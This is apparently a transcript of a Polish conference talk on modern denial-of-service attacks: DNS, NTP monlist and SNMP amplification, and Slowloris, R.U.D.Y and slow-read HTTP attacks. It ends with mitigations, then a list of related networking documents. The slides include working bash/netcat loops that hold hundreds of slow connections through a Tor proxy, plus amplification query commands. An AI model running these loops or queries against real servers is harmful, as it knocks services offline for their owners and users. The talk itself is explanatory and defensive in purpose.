Rentgen współczesnych ataków DoS. Marcin Ulikowski Network Engineer, Atos IT Services
|
|
- Juliusz Muszyński
- 8 lat temu
- Przeglądów:
Transkrypt
1 Rentgen współczesnych ataków DoS Marcin Ulikowski Network Engineer, Atos IT Services
2 Distributed Reflected Denial of Service Ataki wolumetryczne (odbite wzmocnione) 2
3 3
4 4
5 Brak weryfikacji adresu źródłowego (IP spoofing) Protokół bezpołączeniowy UDP jako transport Popularna i dostępna usługa Brak autoryzacji na poziomie aplikacji Zapytanie Odpowiedź 5
6 Otwarte serwery DNS 6
7 Rozszerzenie EDNS0 Odpowiedzi >512B dig. +edns=0 +bufsize=4096 Open DNS resolver ( ) Maksymalny akceptowalny rozmiar odpowiedzi 7
8 IP (tos 0x0, ttl 64, id 5550, offset 0, flags [none], proto UDP (17), length 56) > : [1au] ANY?. (28) IP (tos 0x40, ttl 61, id 58532, offset 0, flags [+], proto UDP (17), length 1500) > : /13/22. RRSIG,. SOA a.root-servers.net. nstld.verisign-grs.com ,. RRSIG,. NS d.rootservers.net.,. NS l.root-servers.net.,. NS b.root-servers.net.,. NS k.rootservers.net.,. NS g.root-servers.net.,. NS a.root-servers.net.,. NS j.rootservers.net.,. NS h.root-servers.net.,. NS e.root-servers.net.,. NS f.rootservers.net.,. NS m.root-servers.net.,. NS c.root-servers.net.,. NS i.rootservers.net.,. RRSIG,. NSEC,. RRSIG,. DNSKEY,. DNSKEY[ domain] IP (tos 0x40, ttl 61, id 58532, offset 1480, flags [none], proto UDP (17), length 651) > : ip-proto
9 $ dig plugawyszuwarek.pl NAPTR +short +notcp +edns=0 +bufsize=4096 sort "" ".-. " "" "" " ( ) " "" "" " '-' " "" "" " J L " "" "" " " "" "" " J L " "" "" " " "" "" " J L " "" "" ".-'..'-. " "" "" " / " "" "" " _.-''' `bmw._ " "" "" ".' `. " "" "" " J `. " "" "" " F L " "" "" " J J " "" "" " J ` " "" "" " L " "" "" " " "" "" " " "" "" " J " "" "" " L " "" "" " " "" "" ", _ " "" "" ",' `''''''''' `-._ " "" "" " J `-. " "" "" " F.-' ` ' `Y8888b.`. " "" "" ".' `P' `88888b " "" "" " J # L # q8888b L " "" "" " )8888D ) " "" "" " J J d8888p P " "" "" " L `..b.,88888p / " "" "" " `. `-.,o88888o.,o88888p'.' " "" "" " `-...-' " "" "" " " "" "" " J " "" "" ".' " "" "" " J " "" "" " " "" "" " Y " "" "" " `. " "" "" " `' :....J " "" "" " " "" "" " L " "" "" " '' ' " "". 9
10 IN ANY plugawyszuwarek.pl? 10
11 11 Źródło: Open Resolver Project
12 1 Mbps /8 ( ) <ROOT> IN ANY? EDNS0 3:00h ~ Spamhaus DDoS < % rekursywnych odpowiedzi EDNS0 76% 12
13 Otwarte serwery NTP 13
14 ntpdc -c monlist Diagnostyczna komenda protokołu NTP służąca do pobrania listy do 600 ostatnich hostów z którymi łączył się serwer czasu. 14
15 $ ntpdc -n -c monlist remote address port local address count m ver rstr avgint lstint ===============================================================================
16 18:05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length :05: IP > : NTPv2, Reserved, length
17 IP + UDP + NTP 440B (6 hostów) Max liczba pakietów Standardowa długość zapytania MON_GETLIST (payload NTP 192B) 17
18 18
19 IP 20B + UDP 8B + NTP 192B 8B 19
20 1 Mbps 57 prefiksów OVH 8B NTP MON_GETLIST 0:15h 1964 serwerów NTP 979 wspiera MON_GETLIST 20
21 Publiczne serwery SNMP 21
22 Ilość obiektów do pobrania Object ID snmpbulkget -Cr c public iso Dostępne dla SNMPv2 i SNMPv3 community string 22
23 $ snmpbulkget Cr3000 -v2c public iso iso = STRING: "Hardware: x86 Family 15 Model 79 Stepping 2 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.1 (Build 2600 Uniprocessor Free)" iso = OID: iso iso = Timeticks: ( ) 2 days, 14:22:05.62 iso = "" iso = STRING: "MICROSOF-D48508" iso = "" iso = INTEGER: 76 iso = INTEGER: 2 iso = INTEGER: 1 iso = INTEGER: 2 iso = Hex-STRING: 4D C 6F 6F B E iso = Hex-STRING: F C E F F D F 6E F 6C 6C D 20 CC E8 ED E8 EF EE F0 F2 20 EF EB E0 ED E8 F0 EE E2 F9 E8 EA E0 20 EF E0 EA E5 F2 EE E2 00 iso = INTEGER: 24 iso = INTEGER: 6 iso = INTEGER: 1520 iso = INTEGER: 1500 iso = Gauge32: iso = Gauge32: iso = "" iso = Hex-STRING: 00 1A FC FC iso = INTEGER: 1 iso = INTEGER: 1 iso = INTEGER: 1 iso = INTEGER: 1 iso = Timeticks: (0) 0:00:00.00 (... ) iso = No more variables left in this MIB View (It is past the end of the MIB tree) 23
24 IP (tos 0x0, ttl 64, id 58102, offset 0, flags [DF], proto UDP (17), length 68) > : { SNMPv2c { GetBulk(25) R= N=0 M= } } IP (tos 0x0, ttl 122, id 60908, offset 0, flags [+], proto UDP (17), length 1500) > : [len1468<asnlen61313] IP (tos 0x0, ttl 122, id 60908, offset 1480, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 2960, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 4440, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 5920, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 7400, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 8880, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 10360, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 11840, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 13320, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 14800, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 16280, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 17760, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 19240, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 20720, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 22200, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 23680, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 25160, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 26640, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 28120, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 29600, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 31080, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 32560, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 34040, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 35520, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 37000, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 38480, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 39960, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 41440, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 42920, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 44400, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 45880, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 47360, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 48840, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 50320, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 51800, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 53280, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 54760, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 56240, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 57720, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 59200, flags [+], proto UDP (17), length 1500) > : ip-proto-17 IP (tos 0x0, ttl 122, id 60908, offset 60680, flags [none], proto UDP (17), length 665) > : ip-proto-17 24
25
26 1 Mbps /8 snmpbulkget v2c c public 3:00h serwerów SNMP Średnia długość odpowiedzi:
27 Wyłącz zbędne usługi Schowaj się za kimś większym (CDN) Filtrowanie ruchu (BCP-38) Rozproszone usługi Dobre relacje z ISP 27
28 Slow HTTP Denial of Service Ataki na warstwę aplikacji 28
29 Bardzo łatwe do przeprowadzenia Trudne do wykrycia przez systemy IDS Nie wymagają dużej przepustowości łącza Nie wymagają botnet-u Możliwe do ukrycia (Tor) 29
30 30
31 Slowloris 31
32 $ nc plugawyszuwarek.pl 80 GET / HTTP/1.1 Host: plugawyszuwarek.pl Connection: keep-alive Accept-Charset: utf8 Accept-language: pl, en-us User-Agent: netcat Brak pustego wiersza HTTP/ Request Time-Out 32
33 Liczba połączeń wątków HTTP Nagłówek HTTP for i in `seq 300`; do ( echo -e "GET / HTTP/1.1\nHost: plugawyszuwarek.pl" nc -X 5 -x :9050 plugawyszuwarek.pl 80 -q 300 & ) ; done Tor proxy Czas trwania sesji TCP Autor nie ponosi odpowiedzialności za niezgodne z prawem wykorzystanie powyższego kodu oraz za wszelkiego rodzaju szkody wyrządzone z jego użyciem. 33
34 R.U.D.Y (R U Dead Yet?) 34
35 $ nc plugawyszuwarek.pl 80 POST / HTTP/1.1 Host: plugawyszuwarek.pl Content-length: \r\n 1=1& 2=2& 3=3& 4=4& 5=5& 35
36 for i in `seq 300`; do ( ( echo -e "POST / HTTP/1.1\nHost: plugawyszuwarek.pl\ncontent-length: \n\n"; for j in `seq 600`; do echo $j=$j\&; sleep 5; done ) nc -X 5 -x :9050 plugawyszuwarek.pl 80 & ); done Autor nie ponosi odpowiedzialności za niezgodne z prawem wykorzystanie powyższego kodu oraz za wszelkiego rodzaju szkody wyrządzone z jego użyciem. 36
37 Slow HTTP READ 37
38 38
39 Po otrzymaniu segmentu, okno TCP odbiorcy - czyli atakującego - jest pełne Rozmiar obiektu większy niż bufor nadawczy serwera Atakujący ustawia rozmiar okna TCP na 0 Serwer stara się podtrzymać sesję TCP 39
40 Czekaj na nagłówek (oraz SSL handshake) do 20s. Jeśli klient przesyła nagłówki z prędkością min. 500B/s czekaj kolejne 20s. <IfModule mod_reqtimeout.c> RequestReadTimeout header=20-40,minrate=500 body=20,minrate=500 </IfModule> Czekaj na dane do 20s. Nie przerywaj połączenia, jeśli klient dosyła dane z prędkością min. 500B/s. 40
41 41
Systemy internetowe. Wykład 5 Architektura WWW. West Pomeranian University of Technology, Szczecin; Faculty of Computer Science
Systemy internetowe Wykład 5 Architektura WWW Architektura WWW Serwer to program, który: Obsługuje repozytorium dokumentów Udostępnia dokumenty klientom Komunikacja: protokół HTTP Warstwa klienta HTTP
Bardziej szczegółowoPrzegląd zagrożeń związanych z DNS. Tomasz Bukowski, Paweł Krześniak CERT Polska
Przegląd zagrożeń związanych z DNS Tomasz Bukowski, Paweł Krześniak CERT Polska Warszawa, styczeń 2011 Agenda Agenda Zagrożenia w Internecie Komunikacja w DNS Zagrożenia w DNS Metody i skutki ataków Zagrożenia
Bardziej szczegółowoXML-RPC: Zdalne wykonywanie procedur
XML-RPC: Zdalne wykonywanie procedur Bartłomiej Świercz Katedra Mikroelektroniki i Technik Informatycznych Łódź, 28 października 2005 roku Wstęp Internet dostarcza wiele możliwości programistą piszącym
Bardziej szczegółowoJak blada twarz psuje serwer HTTP? Kamil Porembiński thecamels.org
Jak blada twarz psuje serwer HTTP? Kamil Porembiński thecamels.org Ping flood Ping flood popularny sposób ataku na serwer internetowy polegający na przeciążeniu łącza pakietami ICMP generowanymi na przykład
Bardziej szczegółowoLaboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark
Laboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark Topologia Cele Część 1: Zapisanie informacji dotyczących konfiguracji IP komputerów Część 2: Użycie programu Wireshark do przechwycenia
Bardziej szczegółowoWyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r.
Wyciąg z ogólnej analizy ataków na witryny administracji państwowej RP w okresie 21 25 stycznia 2012r. W dniach 21 25 stycznia 2012 miał miejsce szereg ataków na zasoby instytucji administracji państwowej,
Bardziej szczegółowoAtaki na aplikacje WWW. Łomem, czy wytrychem? Jak dobrać się do aplikacji WWW
Ataki na aplikacje WWW Łomem, czy wytrychem? Jak dobrać się do aplikacji WWW Ataki na aplikację Ataki na przeglądarkę Ataki na serwer WWW/kontener, etc. Często kombinacja i wiele etapów Którędy do środka
Bardziej szczegółowoTechnologie internetowe
Protokół HTTP Paweł Rajba pawel@ii.uni.wroc.pl http://www.kursy24.eu/ Spis treści Protokół HTTP Adresy zasobów Jak korzystać z telnet? Metody protokołu HTTP Kody odpowiedzi Pola nagłówka HTTP - 2 - Adresy
Bardziej szczegółowo1. Konfiguracja routera i PC. LABORATORIUM 3 Konfiguracja agenta SNMP. Schemat połączeń do konfiguracji komunikacji SNMP zarządca - agent:
LABORATORIUM 3 Konfiguracja agenta SNMP Schemat połączeń do konfiguracji komunikacji SNMP zarządca - agent: 1. Uruchomić 2 komputery PC: dołączyć do jednego z nich interfejs fa 0/0 rutera, a do drugiego
Bardziej szczegółowoZarządzanie sieciami komputerowymi - wprowadzenie
Zarządzanie sieciami komputerowymi - wprowadzenie Model zarządzania SNMP SNMP standardowy protokół zarządzania w sieci Internet stosowany w dużych sieciach IP (alternatywa logowanie i praca zdalna w każdej
Bardziej szczegółowoOUTSIDE 200. 200. 200.0/24. dmz. outside 192. 168.1.0/24. security- level 50 176.16.0.0/16 TRUNK 0/1 VLAN2 0/2 VLAN10 0/3-0/10 VLAN20 0/11-0/24
SNMP - Simple Network Management Protocol Schemat sieci OUTSIDE 200. 200. 200.0/24 outside security- level 0 192. 168.1.0/24 dmz security- level 50 TRUNK 0/1 VLAN2 0/2 VLAN10 0/3-0/10 VLAN20 0/11-0/24
Bardziej szczegółowoNarzędzia do diagnozowania sieci w systemie Windows
Narzędzia do diagnozowania sieci w systemie Windows Polecenie ping Polecenie wysyła komunikaty ICMP Echo Request w celu weryfikacji poprawności konfiguracji protokołu TCP/IP oraz dostępności odległego
Bardziej szczegółowoDR INŻ. ROBERT WÓJCIK DR INŻ. JERZY DOMŻAŁ
DR INŻ. ROBERT WÓJCIK DR INŻ. JERZY DOMŻAŁ INTERNET PROTOCOL (IP) INTERNET CONTROL MESSAGE PROTOCOL (ICMP) WSTĘP DO SIECI INTERNET Kraków, dn. 7 listopada 2016 r. PLAN IPv4: schemat nagłówka ICMP: informacje
Bardziej szczegółowoProgramowanie sieciowe
Programowanie sieciowe Wykład dla studentów Informatyki Stosowanej i Fizyki Komputerowej UJ 2014/2015 Michał Cieśla pok. D-2-47, email: michal.ciesla@uj.edu.pl konsultacje: środy 10-12 http://users.uj.edu.pl/~ciesla/
Bardziej szczegółowoIP Spoofing is still alive... Adam Zabrocki http://pi3.hack.pl ( nie działa ;) ) pi3@itsec.pl (lub oficjalnie: adam@hispasec.com)
Adam Zabrocki http://pi3.hack.pl ( nie działa ;) ) pi3@itsec.pl (lub oficjalnie: adam@hispasec.com) Mapa prezentacji: Cel wykładu... Mapa prezentacji: Cel wykładu... Spojrzenie inżynierskie: Protokół IPv4
Bardziej szczegółowoSieci komputerowe. Zajęcia 3 c.d. Warstwa transportu, protokoły UDP, ICMP
Sieci komputerowe Zajęcia 3 c.d. Warstwa transportu, protokoły UDP, ICMP Zadania warstwy transportu Zapewnienie niezawodności Dostarczanie danych do odpowiedniej aplikacji w warstwie aplikacji (multipleksacja)
Bardziej szczegółowodostępu do okręslonej usługi odbywa się na podstawie tego adresu dostaniemu inie uprawniony dostep
Spoofing oznacza podszywanie się pod inną maszynę w sieci. Może wystąpić na różnych poziomach komunikacji: - sprzetowej zmiana przypisanego do karty MAC adresu jęzeli weryfikacja dostępu do okręslonej
Bardziej szczegółowoAkademickie Centrum Informatyki PS. Wydział Informatyki PS
Akademickie Centrum Informatyki PS Wydział Informatyki PS Akademickie Centrum Informatyki Wydział Informatyki P.S. Warstwy transmisyjne Protokoły sieciowe Krzysztof Bogusławski tel. 449 41 82 kbogu@man.szczecin.pl
Bardziej szczegółowoAtaki sieciowe Materiały pomocnicze do wykładu
Ataki sieciowe Materiały pomocnicze do wykładu Bezpieczeństwo systemów informatycznych Ataki Zbigniew Suski 1 Spoofing ARP Spoofing ARP 1 5 Bufor ARP (ARP Cache) A 2 3 B Bufor ARP (ARP Cache) 6 1. Sprawdzenie
Bardziej szczegółowoBrakujące ogniwo w bezpieczeństwie Internetu
XXII Krajowe Sympozjum Telekomunikacji i Teleinformatyki Bydgoszcz, 13-15 września 2006 DNSSEC Brakujące ogniwo w bezpieczeństwie Internetu Krzysztof Olesik e-mail: krzysztof.olesik@nask.pl DNS Domain
Bardziej szczegółowoLaboratorium - Używanie programu Wireshark do obserwacji mechanizmu uzgodnienia trójetapowego TCP
Laboratorium - Używanie programu Wireshark do obserwacji mechanizmu uzgodnienia trójetapowego Topologia Cele Część 1: Przygotowanie Wireshark do przechwytywania pakietów Wybór odpowiedniego interfejsu
Bardziej szczegółowoProtokół wymiany sentencji, wersja 1
Protokół wymiany sentencji, wersja 1 Sieci komputerowe 2011@ MIM UW Osowski Marcin 28 kwietnia 2011 1 Streszczenie Dokument ten opisuje protokół przesyłania sentencji w modelu klientserwer. W założeniu
Bardziej szczegółowoProtokół zarządzania siecią SNMP
Protokół zarządzania siecią SNMP Simple Network Management Protocol 3. (RFC 3411-3418). Starsze Wersje: SNMP 1, SNMP 2 SNMP jest protokołem wykorzystywanym do zarządzania różnymi elementami sieci (np.
Bardziej szczegółowoBazy Danych i Usługi Sieciowe
Bazy Danych i Usługi Sieciowe Sieci komputerowe Paweł Daniluk Wydział Fizyki Jesień 2012 P. Daniluk (Wydział Fizyki) BDiUS w. VI Jesień 2012 1 / 24 Historia 1 Komputery mainframe P. Daniluk (Wydział Fizyki)
Bardziej szczegółowoMODEL WARSTWOWY PROTOKOŁY TCP/IP
MODEL WARSTWOWY PROTOKOŁY TCP/IP TCP/IP (ang. Transmission Control Protocol/Internet Protocol) protokół kontroli transmisji. Pakiet najbardziej rozpowszechnionych protokołów komunikacyjnych współczesnych
Bardziej szczegółowoAkademickie Centrum Informatyki PS. Wydział Informatyki PS
Akademickie Centrum Informatyki PS Wydział Informatyki PS Akademickie Centrum Informatyki Wydział Informatyki P.S. Warstwy transmisyjne Protokoły sieciowe Krzysztof Bogusławski tel. 449 41 82 kbogu@man.szczecin.pl
Bardziej szczegółowoSieci komputerowe. Wykład dr inż. Łukasz Graczykowski
Sieci komputerowe Wykład 5 3.04.2019 dr inż. Łukasz Graczykowski lukasz.graczykowski@pw.edu.pl Semestr letni 2018/2019 Uzyskiwanie adresu IP Do tej pory zajmowaliśmy się adresami IP oraz przepływem informacji
Bardziej szczegółowoProgramowanie współbieżne i rozproszone
Programowanie współbieżne i rozproszone WYKŁAD 6 dr inż. Komunikowanie się procesów Z użyciem pamięci współdzielonej. wykorzystywane przede wszystkim w programowaniu wielowątkowym. Za pomocą przesyłania
Bardziej szczegółowoWykład 5: Najważniejsze usługi sieciowe: DNS, SSH, HTTP, e-mail. A. Kisiel,Protokoły DNS, SSH, HTTP, e-mail
N, Wykład 5: Najważniejsze usługi sieciowe: DNS, SSH, HTTP, e-mail 1 Domain Name Service Usługa Domain Name Service (DNS) Protokół UDP (port 53), klient-serwer Sformalizowana w postaci protokołu DNS Odpowiada
Bardziej szczegółowoSieci komputerowe Warstwa aplikacji
Sieci komputerowe Warstwa aplikacji 2012-05-24 Sieci komputerowe Warstwa aplikacji dr inż. Maciej Piechowiak 1 Wprowadzenie warstwa zapewniająca interfejs pomiędzy aplikacjami używanymi do komunikacji,
Bardziej szczegółowoDR INŻ. ROBERT WÓJCIK DR INŻ. JERZY DOMŻAŁ
DR INŻ. ROBERT WÓJCIK DR INŻ. JERZY DOMŻAŁ PROTOKOŁY TCP I UDP WSTĘP DO SIECI INTERNET Kraków, dn. 12 grudnia 2016 r. PLAN TCP: cechy protokołu schemat nagłówka znane numery portów UDP: cechy protokołu
Bardziej szczegółowoSieci komputerowe - administracja
Sieci komputerowe - administracja warstwa sieciowa Andrzej Stroiński andrzej.stroinski@cs.put.edu.pl http://www.cs.put.poznan.pl/astroinski/ warstwa sieciowa 2 zapewnia adresowanie w sieci ustala trasę
Bardziej szczegółowoLaboratorium Sieci Komputerowych - 2
Laboratorium Sieci Komputerowych - 2 Analiza prostych protokołów sieciowych Górniak Jakub Kosiński Maciej 4 maja 2010 1 Wstęp Zadanie polegało na przechwyceniu i analizie komunikacji zachodzącej przy użyciu
Bardziej szczegółowoWarstwa sieciowa. Model OSI Model TCP/IP. Aplikacji. Aplikacji. Prezentacji. Sesji. Transportowa. Transportowa
Warstwa sieciowa Model OSI Model TCP/IP Aplikacji Prezentacji Aplikacji podjęcie decyzji o trasowaniu (rutingu) na podstawie znanej, lokalnej topologii sieci ; - podział danych na pakiety Sesji Transportowa
Bardziej szczegółowoMetody ataków sieciowych
Metody ataków sieciowych Podstawowy podział ataków sieciowych: Ataki pasywne Ataki aktywne Ataki pasywne (passive attacks) Polegają na śledzeniu oraz podsłuchiwaniu w celu pozyskiwania informacji lub dokonania
Bardziej szczegółowoSieci komputerowe - Wstęp do intersieci, protokół IPv4
Piotr Kowalski KAiTI Internet a internet - Wstęp do intersieci, protokół IPv Plan wykładu Informacje ogólne 1. Ogólne informacje na temat sieci Internet i protokołu IP (ang. Internet Protocol) w wersji.
Bardziej szczegółowoWybrane działy Informatyki Stosowanej
Wybrane działy Informatyki Stosowanej Dr inż. Andrzej Czerepicki a.czerepicki@wt.pw.edu.pl http://www2.wt.pw.edu.pl/~a.czerepicki 2017 Globalna sieć Internet Koncepcja sieci globalnej Usługi w sieci Internet
Bardziej szczegółowoPodstawy Transmisji Danych. Wykład IV. Protokół IPV4. Sieci WAN to połączenia pomiędzy sieciami LAN
Podstawy Transmisji Danych Wykład IV Protokół IPV4 Sieci WAN to połączenia pomiędzy sieciami LAN 1 IPv4/IPv6 TCP (Transmission Control Protocol) IP (Internet Protocol) ICMP (Internet Control Message Protocol)
Bardziej szczegółowoStos TCP/IP. Warstwa aplikacji cz.2
aplikacji transportowa Internetu Stos TCP/IP dostępu do sieci Warstwa aplikacji cz.2 Sieci komputerowe Wykład 6 FTP Protokół transmisji danych w sieciach TCP/IP (ang. File Transfer Protocol) Pobieranie
Bardziej szczegółowoWprowadzenie Management Information Base (MIB) Simple Network Management Protocol (SNMP) Polecenia SNMP Narzędzia na przykładzie MIB Browser (GUI)
Wprowadzenie Management Information Base (MIB) Simple Network Management Protocol (SNMP) Polecenia SNMP Narzędzia na przykładzie MIB Browser (GUI) () SNMP - Protokół zarządzania sieciami TCP/IP. - UDP
Bardziej szczegółowoMetody zabezpieczania transmisji w sieci Ethernet
Metody zabezpieczania transmisji w sieci Ethernet na przykładzie protokołu PPTP Paweł Pokrywka Plan prezentacji Założenia Cele Problemy i ich rozwiązania Rozwiązanie ogólne i jego omówienie Założenia Sieć
Bardziej szczegółowoProtokół HTTP 1.1 *) Wprowadzenie. Jarek Durak. rfc2616 źródło www.w3.org 1999
Protokół HTTP 1.1 *) Wprowadzenie Jarek Durak * rfc2616 źródło www.w3.org 1999 HTTP Hypertext Transfer Protocol Protokół transmisji hipertekstu został zaprojektowany do komunikacji serwera WW z klientem
Bardziej szczegółowoOSI Transport Layer. Network Fundamentals Chapter 4. Version Cisco Systems, Inc. All rights reserved. Cisco Public 1
OSI Transport Layer Network Fundamentals Chapter 4 Version 4.0 1 OSI Transport Layer Network Fundamentals Rozdział 4 Version 4.0 2 Objectives Explain the role of Transport Layer protocols and services
Bardziej szczegółowoProtokoły sterujące i warstwy aplikacji. Protokół kontrolny ICMP Internet Control Message Protocol Protokoły inicjowania i konfiguracji hostów
Protokoły sterujące i warstwy aplikacji Protokół kontrolny ICMP Internet Control Message Protocol Protokoły inicjowania i konfiguracji hostów RARP Reverse Address REsolution Protocol BOOTP Boot Protocol
Bardziej szczegółowoBezpieczeństwo aplikacji internetowych
Bezpieczeństwo internetowych Marek Zachara http://marek.zachara.name 1/23 Aplikacje internetowe znajdują się pod ciągłym 'ostrzałem' Jest to wynikiem skali: ponad 3 mld użytkowników sieci 900 mln 'hostnames'
Bardziej szczegółowoProgramowanie Sieciowe 1
Programowanie Sieciowe 1 dr inż. Tomasz Jaworski tjaworski@iis.p.lodz.pl http://tjaworski.iis.p.lodz.pl/ Cel przedmiotu Zapoznanie z mechanizmem przesyłania danych przy pomocy sieci komputerowych nawiązywaniem
Bardziej szczegółowoMonitoring ruchu sieciowego w nk.pl w oparciu o protokół netflow oraz rozwiązania opensource
Monitoring ruchu sieciowego w nk.pl w oparciu o protokół netflow oraz rozwiązania opensource Marcin Szukała PLNOG 2013 Warszawa 01.03.2013 marcin@szukala.org Agenda Problemy czyli po co nam to? Dlaczego
Bardziej szczegółowoProgramowanie Sieciowe 2 Protokoły komunikacyjne: HTTP
Programowanie Sieciowe 2 Protokoły komunikacyjne: HTTP mgr inż. Tomasz Jaworski tjaworski@kis.p.lodz.pl http://tjaworski.kis.p.lodz.pl/ Protokoły komunikacyjne HTTP HyperText Transport Protocol 2 Protokół
Bardziej szczegółowoProtokół DHCP. DHCP Dynamic Host Configuration Protocol
Protokół DHCP Patryk Czarnik Bezpieczeństwo sieci komputerowych MSUI 2009/10 DHCP Dynamic Host Configuration Protocol Zastosowanie Pobranie przez stację w sieci lokalnej danych konfiguracyjnych z serwera
Bardziej szczegółowoSIECI KOMPUTEROWE mgr inż. Adam Mencwal Katedra Informatyki Stosowanej
SIECI KOMPUTEROWE mgr inż. Adam Mencwal Katedra Informatyki Stosowanej amencwal@kis.p.lodz.pl http://www.kis.p.lodz.pl/~amencwal/ Sieć komputerowa co to takiego? Sieć komputerowa - to grupa komputerów
Bardziej szczegółowoLaboratorium podstaw telekomunikacji
Laboratorium podstaw telekomunikacji Temat: Pomiar przepustowości łączy w sieciach komputerowych i podstawowe narzędzia sieciowe. Cel: Celem ćwiczenia jest przybliżenie studentom prostej metody pomiaru
Bardziej szczegółowoAdresy w sieciach komputerowych
Adresy w sieciach komputerowych 1. Siedmio warstwowy model ISO-OSI (ang. Open System Interconnection Reference Model) 7. Warstwa aplikacji 6. Warstwa prezentacji 5. Warstwa sesji 4. Warstwa transportowa
Bardziej szczegółowoProgramowanie w Internecie
mariusz@math.uwb.edu.pl http://math.uwb.edu.pl/~mariusz Uniwersytet w Białymstoku 2018/2019 Co to jest Internet? Warunki zaliczenia Zaliczenie na podstawie opracowanej samodzielnie aplikacji WWW Zastosowane
Bardziej szczegółowoTCP/IP. Warstwa aplikacji. mgr inż. Krzysztof Szałajko
TCP/IP Warstwa aplikacji mgr inż. Krzysztof Szałajko Modele odniesienia 7 Aplikacji 6 Prezentacji 5 Sesji 4 Transportowa 3 Sieciowa 2 Łącza danych 1 Fizyczna Aplikacji Transportowa Internetowa Dostępu
Bardziej szczegółowoPlan wykładu. Domain Name System. Hierarchiczna budowa nazw. Definicja DNS. Obszary i ich obsługa Zapytania Właściwości.
Sieci owe Sieci owe Plan wykładu Domain Name System System Nazw Domen Definicja DNS Hierarchiczna budowa nazw Obszary i ich obsługa Zapytania Właściwości Sieci owe Sieci owe Definicja DNS DNS to rozproszona
